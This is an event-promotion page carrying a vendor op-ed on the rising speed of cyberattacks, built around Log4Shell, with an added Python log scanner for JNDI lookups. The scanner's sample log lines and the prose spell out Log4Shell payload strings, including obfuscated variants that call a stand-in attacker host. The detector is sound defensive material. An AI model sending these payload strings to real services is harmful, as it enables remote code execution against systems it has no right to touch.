Can technology innovation – coupled with the boldest kind of leadership – work together to start fixing the most intractable problems facing America? On July 21 – we’re going to find out. The countdown to MerITocracy 2022: American Innovation Forum is on.
The in-person forum – at the Marriott Marquis in Washington, D.C., from 8:00 a.m. to 6:00 p.m. – will host bipartisan leaders from Congress, the Biden administration, and America’s tech industry to examine the most pressing problems facing citizens in our democracy, and map out creative solutions from the nexus of policy and technology. Register today.
In the lead-up to the July 21 forum, we are table-setting a host of big issues that will get serious attention at MerITocracy 2022.
Today, Jim Richberg, Public Sector Field CISO at Fortinet, talks about the increasing velocity of cyberattacks, and what the Federal government needs to do to win those battles and protect operations and citizen data:
Cyber Attacks Are Getting Faster, and Feds Must Adjust
Cyberattacks aren’t just getting more powerful; they’re also getting faster. Speed and rapid escalation are forcing Federal agencies to reassess their readiness so they can detect and beat back the next attack before it spreads.
Attackers have come a long way since the first ransomware attack in 1989. When the AIDS Trojan debuted, it could only spread by physical mail: about 20,000 infected floppy disks were sent out to AIDS researchers worldwide.
Cybercrime itself isn’t all that old. Between 1971, when the first self-replicating program appeared, and the early 2000s, malware was mostly mischief and authors testing whether something they had written would actually work. The Mytob variants in 2005 changed everything by combining worm, backdoor, and botnet functionality in a single piece of code, making malware a far more powerful tool for attackers.
Since then, the threat landscape has evolved from mischief to include profitable cybercrime and nation-state attacks. The shift from the original term virus to today’s all-encompassing malware reflects that evolution. The development of these attacks has been accelerated by today’s hyper-connected world.
No Speed Limits
While attacks have grown more powerful since then, it is only in the last few years that their speed has jumped significantly. Most vulnerabilities lie dormant for a year or two before they are exploited at scale, but some are exploited almost immediately.
The Log4j vulnerability of December 2021, known as Log4Shell (CVE-2021-44228), is an instructive case study in how speed is changing. The critical flaw in the Apache Log4j 2 Java logging library affected an enormous number of environments, because Log4j is embedded in countless Java applications and products. It was trivially easy to exploit: an attacker only needed to get a string of the form ${jndi:ldap://<attacker server>/x} into any field the application logged, such as an HTTP header or a username, and a vulnerable Log4j version would perform the JNDI lookup and load code from the attacker’s server, handing over complete control of the system.
Fortinet saw indications that the vulnerability had been weaponized and had successfully compromised devices a mere 82 minutes after it was publicly disclosed.
Not long after the first disclosure, two further Log4j vulnerabilities (CVE-2021-45046 and CVE-2021-45105) were found in the patched releases, meaning organizations had to update their Log4j deployments three times in a single week. Exploitation activity escalated so quickly that Log4j became the most prevalent IPS detection of the entire second half of 2021.
Log4j generated nearly 50 times the volume of activity seen for ProxyLogon, the Microsoft Exchange Server exploit chain that made headlines in early 2021. Thankfully, at the time of writing there were no reports of significant compromises involving Log4j, but that doesn’t mean attackers aren’t lying in wait, watching for the right time to make their move. Threat intelligence from the second half of 2021 shows attacks becoming more automated and faster, reflecting more advanced persistent cybercrime strategies that are both more destructive and less predictable.
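To make the speed and evasion point concrete, here is an added example, written for this page and not Fortinet’s code or any product’s IPS signature. It is a small Python detector that runs over constructed web-server log lines and flags Log4Shell-style ${jndi:...} lookups. The sample lines, the IP addresses, and the set of obfuscation tricks it handles (Log4j’s lower/upper lookups, the :- default-value syntax, and URL encoding) are assumptions chosen for illustration. What it shows is that a naive signature for the literal string ${jndi: misses most of the variants that actually circulated, which is why normalizing before matching matters when exploitation starts within hours of disclosure.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for illustration (not real captures).
# 198.51.100.0/24 is a documentation range; all hosts here are hypothetical.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:20:14:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:20:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:20:15:31 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '10.0.0.8 - - [10/Dec/2021:20:16:44 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - [10/Dec/2021:20:17:02 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fd%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.10 - - [10/Dec/2021:20:18:00 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Innermost ${...} lookup: a body with no nested '${' or '}' inside it.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A JNDI lookup using one of the protocols seen in Log4Shell payloads.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:",
    re.IGNORECASE,
)


def _resolve_innermost(match):
    """Collapse the obfuscation lookups the way Log4j's substitutor would.

    Handled (assumed subset): ${lower:X} -> x, ${upper:X} -> X, and
    ${anything:-default}, which yields 'default' when the lookup resolves
    to nothing (e.g. ${::-j}). Any other lookup, including the jndi one we
    want to keep visible, is left intact.
    """
    body = match.group(1)
    head, sep, rest = body.partition(":")
    if sep and head.strip().lower() == "lower":
        return rest.lower()
    if sep and head.strip().lower() == "upper":
        return rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize(text, max_rounds=20):
    """URL-decode once, then repeatedly resolve innermost lookups."""
    text = unquote(text)
    for _ in range(max_rounds):  # bounded so hostile input cannot loop forever
        resolved = INNERMOST_LOOKUP.sub(_resolve_innermost, text)
        if resolved == text:
            break
        text = resolved
    return text


def naive_hits(lines):
    """What a literal-string signature sees: line numbers containing '${jndi:'."""
    return [n for n, line in enumerate(lines, 1) if "${jndi:" in line.lower()]


def scan_log_lines(lines):
    """Return (line number, protocol, normalized line) for each JNDI lookup found."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI_LOOKUP.search(norm)
        if m:
            hits.append((n, m.group(1).lower(), norm))
    return hits


if __name__ == "__main__":
    print("naive signature flags lines:", naive_hits(SAMPLE_LOG_LINES))
    for n, proto, norm in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {n}: jndi via {proto}: {norm}")
```

On the constructed sample the literal signature catches only the plain payload, while the normalized scan also catches the lower/upper, default-value, and URL-encoded variants and ignores the harmless ${env:HOME} lookup. A production detector would additionally decode request bodies, JSON fields, and base64-wrapped values, but the principle is the same: a ${jndi: lookup arriving in request data is almost never legitimate, so hunting for it in historical logs is a quick way to check whether a deployment was probed during the hours before it was patched.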
Steps Agencies Can Take
First, get to know your adversaries. A deeper understanding of attack techniques helps stop bad actors faster. By analyzing adversaries’ goals, agencies can align their defenses with the techniques attackers adopt in pursuit of those goals.
To get this insight, agencies can partner with organizations that analyze malware samples. This gives security teams a view of the tactics, techniques, and procedures (TTPs) behind each sample, and of what would have happened had the attack succeeded.
That kind of intelligence is invaluable for responding to ever-increasing attack speeds. Agencies can use it to direct resources at the threats that present the biggest risk: if two malware execution techniques account for the majority of observed activity, security teams can focus their detection and hardening on those two techniques.
Beyond that, agencies should deploy an integrated, automated security platform; they can no longer rely on siloed tools that don’t share telemetry with each other.
Understanding the Threat Intelligence Landscape
As threats become faster and more sophisticated across the entire attack surface, Federal cybersecurity teams need technology that interoperates and can ingest real-time threat intelligence. A good solution needs to detect threat patterns, correlate data to surface anomalies, and automatically initiate a coordinated response.
This requires a cybersecurity mesh platform that provides centralized management, automation, and a single cohesive view across the environment.
Agencies face enormous cybersecurity challenges. It can be overwhelming to decide which obstacles to tackle first and how, but the reality is that as attacks get faster, the Federal government’s defenses have to get faster too. It can be done, and it doesn’t have to be painful. It takes integrating the right solutions and a better understanding of how attackers are changing.